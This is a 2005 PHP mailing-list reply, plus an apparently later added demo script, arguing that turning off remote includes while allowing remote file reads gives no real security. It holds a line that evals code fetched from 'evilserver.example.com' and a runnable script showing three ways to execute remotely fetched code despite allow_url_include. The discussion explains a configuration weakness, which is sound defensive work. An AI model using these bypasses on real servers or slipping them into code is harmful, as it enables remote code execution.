Posted by Richard Lynch on 03/02/05 21:04
Tom Z Meinlschmidt wrote:
> Tell me - how do you want to turn off remote includes and keep remote
> files working?
Change the PHP source?
That's the only viable answer I can think of; though I doubt it's one you
want to hear/use.
Sorry.
> allow_url_fopen turns off _both_. There's no choice about what to disable.
Consider this:
<?php
eval(implode('',file("http://evilserver.example.com")));
?>
So, like, what's the point of turning off only remote include and keeping
remote file?
Maybe you'll stop a naive newbie from something stupid, but probably not
even slow down a script kiddie, much less a dedicated attacker.
For that matter, even a naive newbie would be able to figure out the
eval(file()) solution or Google for it and find it in less than an hour.
If you turn off eval, they make a file 777 (ugh!) and then read the remote
file, write it into their 777 file, and then include that.
If you don't trust remote include, you can't trust remote files and vice
versa. That's all there is to it, really.
Anything else is simply self-delusions of "security" imho. [shrug]
--
Like Music?
http://l-i-e.com/artists.htm
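The three routes Richard describes, written out as an added example (this is not code from the original post). It uses a `data:` URL as a stand-in for the attacker's web server so it runs offline; PHP applies `allow_url_fopen` and `allow_url_include` to the `data:` wrapper exactly as it does to `http:`. The `allow_url_include` directive is newer than this thread (PHP 5.2), and the point of the example is that it does not change the conclusion: the payload text, the `try_route` helper and the route names are all constructed for the demo.

```php
<?php
// Added example, not from the original post. A data: URL stands in for
// "http://evilserver.example.com" so the script runs offline; data: is
// governed by allow_url_fopen / allow_url_include just like http:.
$payload = '<?php $GLOBALS["pwned"] = "executed via " . $GLOBALS["route"];';
$url = 'data://text/plain;base64,' . base64_encode($payload);

// Runs one route and reports whether the remote payload actually executed.
// Warnings from blocked wrappers are suppressed; "blocked" is the signal.
function try_route(string $name, callable $fn, string $url): string
{
    $GLOBALS['route'] = $name;
    unset($GLOBALS['pwned']);
    try {
        @$fn($url);
    } catch (Throwable $e) {
        return "$name: error - " . $e->getMessage();
    }
    return $name . ': ' . ($GLOBALS['pwned'] ?? 'blocked');
}

$routes = [];

// Route 1: the remote include people try to switch off. Since PHP 5.2 this
// needs allow_url_include=On (which itself needs allow_url_fopen=On).
$routes['include'] = function (string $url) { include $url; };

// Route 2: Richard's bypass. file() is an ordinary read, so it only needs
// allow_url_fopen; eval() turns the read into an include. The leading '?>'
// drops out of PHP mode so the payload's own <?php tag is parsed normally.
$routes['file+eval'] = function (string $url) {
    eval('?>' . implode('', file($url)));
};

// Route 3: the fallback if eval() is off the table. Read remotely, write to
// a world-writable location, include locally. A local include is never
// subject to allow_url_* at all.
$routes['fetch+write+include'] = function (string $url) {
    $tmp = tempnam(sys_get_temp_dir(), 'rfi');   // stands in for the "777 file"
    file_put_contents($tmp, file_get_contents($url));
    include $tmp;
    unlink($tmp);
};

printf("allow_url_fopen=%s allow_url_include=%s\n",
    ini_get('allow_url_fopen') ? 'On' : 'Off',
    ini_get('allow_url_include') ? 'On' : 'Off');
foreach ($routes as $name => $fn) {
    echo try_route($name, $fn, $url), "\n";
}
```

Run it under the stock configuration (allow_url_fopen=On, allow_url_include=Off) and only the first route reports "blocked"; the other two execute the fetched code, which is Richard's point about separating the two settings. Set allow_url_fopen=Off and all three are blocked, because every route starts with a URL read. Nothing here can be switched off with disable_functions alone: eval() is a language construct, not a function, and include of a local file has to keep working.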